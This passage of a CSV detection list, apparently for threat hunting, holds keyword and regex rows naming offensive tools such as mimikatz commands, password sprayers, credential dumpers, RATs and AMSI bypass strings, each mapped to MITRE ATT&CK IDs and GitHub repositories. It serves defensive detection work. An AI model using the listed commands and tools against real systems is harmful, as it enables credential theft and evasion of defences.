Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*TREVORspray-dev*",".{0,1000}TREVORspray\-dev.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*TREVORspray-master*",".{0,1000}TREVORspray\-master.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*TREVORspray-trevorspray*",".{0,1000}TREVORspray\-trevorspray.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*tricks01.hwtxt*",".{0,1000}tricks01\.hwtxt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*trickster0/EDR_Detector*",".{0,1000}trickster0\/EDR_Detector.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*trickster0/Enyx*",".{0,1000}trickster0\/Enyx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*trickster0/TartarusGate*",".{0,1000}trickster0\/TartarusGate.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","1","N/A","10","5","448","59","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z" "*Trojan.Lazagne*",".{0,1000}Trojan\.Lazagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*Trojan:Win32/TurtleLoader.*",".{0,1000}Trojan\:Win32\/TurtleLoader\..{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*TR-SLimey/wraith-RAT*",".{0,1000}TR\-SLimey\/wraith\-RAT.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*TrU57(C00K13s)*",".{0,1000}TrU57\(C00K13s\).{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*truecrypt2john.py*",".{0,1000}truecrypt2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*True-Demon*",".{0,1000}True\-Demon.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting offensive tools and exploitation frameworks","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/True-Demon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*truerustyy/wcreddump*",".{0,1000}truerustyy\/wcreddump.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*trufflehog git *",".{0,1000}trufflehog\sgit\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*truffleHog*",".{0,1000}truffleHog.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1083 - T1081 - T1213 - T1212","TA0002 - TA0003 - TA0004 - TA0007","N/A","N/A","Information Gathering","https://github.com/dxa4481/truffleHog","1","0","N/A","N/A","10","13926","1514","2024-05-01T19:24:48Z","2016-12-31T05:08:12Z" "*TruffleSnout.exe*",".{0,1000}TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*--trusted-for-delegation --kdcHost *",".{0,1000}\-\-trusted\-for\-delegation\s\-\-kdcHost\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*TrustedPath-UACBypass-BOF*",".{0,1000}TrustedPath\-UACBypass\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*trustedsec/social-engineer-toolkit*",".{0,1000}trustedsec\/social\-engineer\-toolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","10238","2645","2023-12-21T20:10:33Z","2012-12-31T22:01:33Z" "*trustedsec/unicorn*",".{0,1000}trustedsec\/unicorn.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*Try opening it with Mimikatz now :)*",".{0,1000}Try\sopening\sit\swith\sMimikatz\snow\s\:\).{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*TryCatchHCF*",".{0,1000}TryCatchHCF.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting sniffing spoofing and data exfiltration tools","N/A","N/A","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Trying anon RCE using * for *",".{0,1000}Trying\sanon\sRCE\susing\s.{0,1000}\sfor\s.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*Trying to dump kernel to C:*",".{0,1000}Trying\sto\sdump\skernel\sto\sC\:.{0,1000}","offensive_tool_keyword","DumpKernel-S1.ps1","SentinelHelper to perform a live kernel dump in a Windows environment","T1055 - T1003 - T1112","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8f29e09d74b73e1dec3f9049c4358e80","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*ts.php*vi.txt*",".{0,1000}ts\.php.{0,1000}vi\.txt.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ts::logonpasswords*",".{0,1000}ts\:\:logonpasswords.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*ts::mstsc*",".{0,1000}ts\:\:mstsc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*ts::multirdp*",".{0,1000}ts\:\:multirdp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*ts::remote*",".{0,1000}ts\:\:remote.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*ts::sessions*",".{0,1000}ts\:\:sessions.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*tspkg/decryptor.py*",".{0,1000}tspkg\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*TunnelGRE/Augustus*",".{0,1000}TunnelGRE\/Augustus.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","127","26","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*Tunneling failed! Start your own port forwarding/tunneling service at port *",".{0,1000}Tunneling\sfailed!\sStart\syour\sown\sport\sforwarding\/tunneling\sservice\sat\sport\s.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*TunnelVision/pushrouteconfig.sh*",".{0,1000}TunnelVision\/pushrouteconfig\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*turn_keylogger*",".{0,1000}turn_keylogger.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*TVqQAAMAAAAEAAAA*",".{0,1000}TVqQAAMAAAAEAAAA.{0,1000}","offensive_tool_keyword","base64","start of an executable payload in base64","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*TVqQAAMAAAAEAAAA*",".{0,1000}TVqQAAMAAAAEAAAA.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*twint -g=*km* -o * --csv*",".{0,1000}twint\s\-g\=.{0,1000}km.{0,1000}\s\-o\s.{0,1000}\s\-\-csv.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*twint -u * --since *",".{0,1000}twint\s\-u\s.{0,1000}\s\-\-since\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*twittor.py*",".{0,1000}twittor\.py.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","752","216","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" "*twittor-master.zip*",".{0,1000}twittor\-master\.zip.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","752","216","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" "*TWV0YXNwbG9pdCBSUEMgTG9hZGVy*",".{0,1000}TWV0YXNwbG9pdCBSUEMgTG9hZGVy.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Tycx2ry/SweetPotato*",".{0,1000}Tycx2ry\/SweetPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*Tylous/Ivy*",".{0,1000}Tylous\/Ivy.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*Tylous/SourcePoint*",".{0,1000}Tylous\/SourcePoint.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*Tylous/ZipExec*",".{0,1000}Tylous\/ZipExec.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*TypeError/domained*",".{0,1000}TypeError\/domained.{0,1000}","offensive_tool_keyword","domained","A domain name enumeration tool","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/TypeError/domained","1","1","N/A","N/A","8","722","157","2021-04-11T09:54:50Z","2017-08-18T00:03:39Z" "*Tztufn/Nbobhfnfou/Bvupnbujpo/BntjVujmt*",".{0,1000}Tztufn\/Nbobhfnfou\/Bvupnbujpo\/BntjVujmt.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*-u SSARedTeam:s3cr3t*",".{0,1000}\-u\sSSARedTeam\:s3cr3t.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 